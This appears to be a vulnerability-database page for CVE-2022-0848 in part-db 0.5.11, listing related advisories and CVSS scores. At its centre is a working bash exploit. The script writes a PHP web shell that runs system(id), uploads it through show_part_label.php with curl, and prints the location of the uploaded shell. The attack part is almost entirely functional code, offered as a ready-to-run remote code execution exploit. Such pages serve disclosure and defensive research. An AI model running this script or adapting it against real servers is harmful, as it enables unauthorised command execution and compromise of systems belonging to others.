Lucene search
K

part-db 0.5.11 - Remote Code Execution Exploit

🗓️ 07 Mar 2022 00:00:00Reported by Chetanya SharmaType 
zdt
 zdt
🔗 0day.today👁 493 Views

part-db 0.5.11 Remote Code Execution (RCE) via Curl Comman

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for OS Command Injection in Part-Db_Project Part-Db
11 Mar 202207:26
githubexploit
Huntr
OS Command Injection in part-db/part-db
15 Feb 202211:36
huntr
ATTACKERKB
CVE-2022-0848
4 Mar 202209:15
attackerkb
CNNVD
part-db 操作系统命令注入漏洞
4 Mar 202200:00
cnnvd
Check Point Advisories
Part-DB Project Unrestricted File Upload (CVE-2022-0848)
10 Nov 202200:00
checkpoint_advisories
CVE
CVE-2022-0848
4 Mar 202208:25
cve
Cvelist
CVE-2022-0848 OS Command Injection in part-db/part-db
4 Mar 202208:25
cvelist
Exploit DB
part-db 0.5.11 - Remote Code Execution (RCE)
7 Mar 202200:00
exploitdb
NVD
CVE-2022-0848
4 Mar 202209:15
nvd
OSV
CVE-2022-0848 OS Command Injection in part-db/part-db
4 Mar 202208:25
osv
Rows per page
# Exploit Title: part-db 0.5.11 - Remote Code Execution (RCE)
# Exploit Author: Sunny Mehra @DSKMehra
# Vendor Homepage: https://github.com/part-db/part-db
# Software Link: https://github.com/part-db/part-db
# Version: [ 0.5.11.] 
# Tested on: [KALI OS]
# CVE : CVE-2022-0848
#
---------------

#!/bin/bash
host=127.0.0.1/Part-DB-0.5.10 #WEBHOST
#Usage: Change host 
#Command: bash exploit.sh
#EXPLOIT BY @DSKMehra
echo "<?php system(id); ?>">POC.phtml  #PHP Shell Code
result=`curl -i -s -X POST -F "[email protected]" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > <p)'`
rm POC.phtml
echo Shell Location : "$host/data/media/labels/$result"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Mar 2022 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 3.19.8
CVSS 210
CVSS 310
EPSS0.40258
493